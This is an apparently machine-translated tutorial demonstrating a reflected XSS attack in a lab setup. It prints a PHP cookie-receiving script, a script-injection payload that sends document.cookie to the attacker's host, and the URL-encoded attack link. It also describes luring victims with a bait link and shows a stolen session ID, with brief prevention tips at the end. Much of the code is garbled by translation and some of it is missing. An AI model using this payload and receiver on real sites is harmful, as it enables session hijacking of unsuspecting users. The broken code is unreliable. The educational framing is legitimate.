Simple demonstration of XSS cross-site scripting attack Process
Most people have a basic understanding of the principles of XSS. Here we will not repeat it again. We will only provide a complete example to demonstrate its principles.
1. The role is assigned to a website with the XXS vulnerability. The IP address is 172.16.35.135 and PHP is the development language.
Victim visitor, IP address 172.16.35.220, browser IE11
Hacker data receiving website, IP address 172.16.2.192, PHP for development language 2 source code instance 2.1 vulnerability website
Vulnerability URL: http: // 172.16.35.135/xss_demo.php
<?php session_start(); ?> <!doctype html>
This webpage writes the form data sent by the user through GET directly to the returned html stream without processing. This is where the XSS vulnerability exists.
2.2 The hacker receives the website URL as http: // 172.16.2.192/xss_hacker.php.
<? Php $ victim = 'xxs cookie :'. $ _ SERVER ['remote _ ADDR ']. ':'. $ _ GET ['cookies']; file_put_contents('xss_victim.txt ', $ victim );
Write the user's IP address and cookieword used by the website without holes into the xss_victim.txt file for backup.
2.3 normal user access
You can use IE11 to access the website. Currently, session + cookie is used to store user logon information on websites. The website verifies the cookie to determine whether the user is valid and logged on. Therefore, cookie is the user's sensitive data.
3 attack process 3.1 The hacker prepares the attack string to construct the attack URL
Hackers can use a variety of scanning tools or manual input to find the URLs of websites with XSS vulnerabilities, and then carefully construct attack strings. In this example, the constructed string is:
"/> <Script> window. open (" http: // 172.16.2.192/xss_hacker.php? Cookie = "+ document. cookie); </script> <! --
As long as this string is input and submitted as the form value in the vulnerability website text editing box, it will cause an attack. Manually enter this string and submit it. The browser address bar automatically generates an attack URL. For example:
In this case, the html code used to access the website with the vulnerability is modified:
<!doctype html>
Obviously, this html will go back and execute a script, which sends the user's cookie to the hacker's receiving website.
The final attack URL is:
Http: // 172.16.35.135/xss_demo.php? Address1 = % 22% 2F % 3E + % 3 Cscript % 3Ewindow. open % 28% 22 http % 3A % 2F % 2F172. 16.2.192% 2Fxss_hacker.php % 3 Fcookie % 3D % 22% 2Bdocument. cookie % 29% 3B % 3C % 2 Fscript % 3E % 3C % 21 --
The next step is to find the victim and entice him to click on the above URL.
3.2 users mistakenly click the attacked URL
Hackers can use various means, including sending emails to publish the attack URL on various forums, such as making the following attractive connections.
Diaosi liked the beauty most. Driven by curiosity, they clicked on the beauty picture. The consequence of clicking is to access the previous attack URL.
3.3 sensitive user data is sent to hacker receiving websites
After the victim accesses the attacked URL, sensitive data is automatically sent to the hacker's receiving website. The receiving website saves the sensitive information to the file. Of course, the actual situation must be stored in the database.
Xss_victim.txt now stores sensitive data of the victim.
Cookie obtained by XXS: 172.16.35.220: PHPSESSID = 4duu55hgci1leee4os6101cl30
Note that the XSS filter is enabled by default in IE11, and IE will block the above simple Attack Script. To simulate attacks, we temporarily disable the XSS filter.
3.4 hackers use sensitive data to do bad things
With the sensitive data of the victim user, you can use the data to do various bad things, such as logging on to the website as the victim user, and so on.
4. XSS prevention
XSS prevention can be started from multiple aspects:
(1) As described above, the browser itself can identify simple XSS attack strings to prevent simple XSS attacks;
(2) fundamentally, the solution is to eliminate the XSS vulnerability of the website, which requires website developers to keep their security in mind by using escape security characters and other means;
(3) For Common Internet users, be sure to resist the temptation as much as possible. Do not click the link of a non-well-known website.